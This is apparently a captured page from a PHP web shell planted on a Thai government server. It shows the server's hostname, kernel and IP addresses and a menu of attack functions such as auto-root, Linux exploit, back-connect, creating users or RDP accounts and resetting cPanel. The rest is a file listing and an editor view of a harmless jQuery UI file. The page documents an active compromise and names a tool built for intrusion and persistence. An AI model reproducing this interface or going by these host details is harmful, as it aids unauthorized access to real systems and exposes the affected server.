Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss_test /
images /
jquery /
ui /
minified /
[ HOME SHELL ]
Name
Size
Permission
Action
jquery.effects.blind.min.js
888
B
-rw-r--r--
jquery.effects.bounce.min.js
1.65
KB
-rw-r--r--
jquery.effects.clip.min.js
1.05
KB
-rw-r--r--
jquery.effects.core.min.js
10.55
KB
-rw-r--r--
jquery.effects.drop.min.js
1.06
KB
-rw-r--r--
jquery.effects.explode.min.js
1.61
KB
-rw-r--r--
jquery.effects.fade.min.js
577
B
-rw-r--r--
jquery.effects.fold.min.js
1.12
KB
-rw-r--r--
jquery.effects.highlight.min.j...
914
B
-rw-r--r--
jquery.effects.pulsate.min.js
951
B
-rw-r--r--
jquery.effects.scale.min.js
3.87
KB
-rw-r--r--
jquery.effects.shake.min.js
1.12
KB
-rw-r--r--
jquery.effects.slide.min.js
1.05
KB
-rw-r--r--
jquery.effects.transfer.min.js
816
B
-rw-r--r--
jquery.ui.accordion.min.js
9.01
KB
-rw-r--r--
jquery.ui.autocomplete.min.js
8.79
KB
-rw-r--r--
jquery.ui.button.min.js
6.71
KB
-rw-r--r--
jquery.ui.core.min.js
4.23
KB
-rw-r--r--
jquery.ui.datepicker.min.js
35.53
KB
-rw-r--r--
jquery.ui.dialog.min.js
11.4
KB
-rw-r--r--
jquery.ui.draggable.min.js
18.24
KB
-rw-r--r--
jquery.ui.droppable.min.js
5.64
KB
-rw-r--r--
jquery.ui.mouse.min.js
2.75
KB
-rw-r--r--
jquery.ui.position.min.js
3.53
KB
-rw-r--r--
jquery.ui.progressbar.min.js
1.8
KB
-rw-r--r--
jquery.ui.resizable.min.js
17
KB
-rw-r--r--
jquery.ui.selectable.min.js
4.21
KB
-rw-r--r--
jquery.ui.slider.min.js
9.9
KB
-rw-r--r--
jquery.ui.sortable.min.js
23.36
KB
-rw-r--r--
jquery.ui.tabs.min.js
11.36
KB
-rw-r--r--
jquery.ui.widget.min.js
3.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.ui.mouse.min.js
/*! * jQuery UI Mouse 1.8.13 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Mouse * * Depends: * jquery.ui.widget.js */ (function(b){var d=false;b(document).mousedown(function(){d=false});b.widget("ui.mouse",{options:{cancel:":input,option",distance:1,delay:0},_mouseInit:function(){var a=this;this.element.bind("mousedown."+this.widgetName,function(c){return a._mouseDown(c)}).bind("click."+this.widgetName,function(c){if(true===b.data(c.target,a.widgetName+".preventClickEvent")){b.removeData(c.target,a.widgetName+".preventClickEvent");c.stopImmediatePropagation();return false}});this.started=false},_mouseDestroy:function(){this.element.unbind("."+ this.widgetName)},_mouseDown:function(a){if(!d){this._mouseStarted&&this._mouseUp(a);this._mouseDownEvent=a;var c=this,f=a.which==1,g=typeof this.options.cancel=="string"?b(a.target).parents().add(a.target).filter(this.options.cancel).length:false;if(!f||g||!this._mouseCapture(a))return true;this.mouseDelayMet=!this.options.delay;if(!this.mouseDelayMet)this._mouseDelayTimer=setTimeout(function(){c.mouseDelayMet=true},this.options.delay);if(this._mouseDistanceMet(a)&&this._mouseDelayMet(a)){this._mouseStarted= this._mouseStart(a)!==false;if(!this._mouseStarted){a.preventDefault();return true}}true===b.data(a.target,this.widgetName+".preventClickEvent")&&b.removeData(a.target,this.widgetName+".preventClickEvent");this._mouseMoveDelegate=function(e){return c._mouseMove(e)};this._mouseUpDelegate=function(e){return c._mouseUp(e)};b(document).bind("mousemove."+this.widgetName,this._mouseMoveDelegate).bind("mouseup."+this.widgetName,this._mouseUpDelegate);a.preventDefault();return d=true}},_mouseMove:function(a){if(b.browser.msie&& !(document.documentMode>=9)&&!a.button)return this._mouseUp(a);if(this._mouseStarted){this._mouseDrag(a);return a.preventDefault()}if(this._mouseDistanceMet(a)&&this._mouseDelayMet(a))(this._mouseStarted=this._mouseStart(this._mouseDownEvent,a)!==false)?this._mouseDrag(a):this._mouseUp(a);return!this._mouseStarted},_mouseUp:function(a){b(document).unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate);if(this._mouseStarted){this._mouseStarted= false;a.target==this._mouseDownEvent.target&&b.data(a.target,this.widgetName+".preventClickEvent",true);this._mouseStop(a)}return false},_mouseDistanceMet:function(a){return Math.max(Math.abs(this._mouseDownEvent.pageX-a.pageX),Math.abs(this._mouseDownEvent.pageY-a.pageY))>=this.options.distance},_mouseDelayMet:function(){return this.mouseDelayMet},_mouseStart:function(){},_mouseDrag:function(){},_mouseStop:function(){},_mouseCapture:function(){return true}})})(jQuery);
Close